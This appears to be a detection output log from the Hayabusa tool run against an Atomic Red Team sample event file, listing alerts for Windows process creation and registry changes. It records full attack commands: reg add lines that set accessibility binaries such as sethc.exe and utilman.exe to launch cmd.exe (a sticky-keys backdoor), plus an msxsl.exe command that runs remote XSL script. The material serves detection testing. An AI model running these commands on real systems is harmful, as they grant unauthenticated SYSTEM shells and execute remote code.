+2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D890-5D31-0000-001085443200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1228 | PGUID: 747F3D96-D89A-5D31-0000-0010A46B3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1132 | PGUID: 747F3D96-D89A-5D31-0000-0010F2703200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 864 | PGUID: 747F3D96-D89F-5D31-0000-00106C7D3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2404 | PGUID: 747F3D96-D89F-5D31-0000-0010BC823200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D8A2-5D31-0000-00108A8F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D8A2-5D31-0000-0010D8943200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4212 | PGUID: 747F3D96-D8A5-5D31-0000-0010729B3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6116 | PGUID: 747F3D96-D8A5-5D31-0000-0010C0A03200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D8A6-5D31-0000-001053A73200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6664 | PGUID: 747F3D96-D8A6-5D31-0000-0010F9B13200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D8A9-5D31-0000-001072C43200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6016 | PGUID: 747F3D96-D8AA-5D31-0000-0010C0C93200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6244 | PGUID: 747F3D96-D8AB-5D31-0000-001054D03200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1888 | PGUID: 747F3D96-D8AB-5D31-0000-0010A4D53200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49727 (MSEDGEWIN10.home) | Dst: 172.217.17.132:80 (ams15s30-in-f4.1e100.net) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D8CA-5D31-0000-0010DA413300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6268 | PGUID: 747F3D96-D8CA-5D31-0000-0010CF443300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D8CC-5D31-0000-001038513300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1852 | PGUID: 747F3D96-D8CD-5D31-0000-001047543300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D8CF-5D31-0000-00109B603300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:list | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D8D0-5D31-0000-0010F3623300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
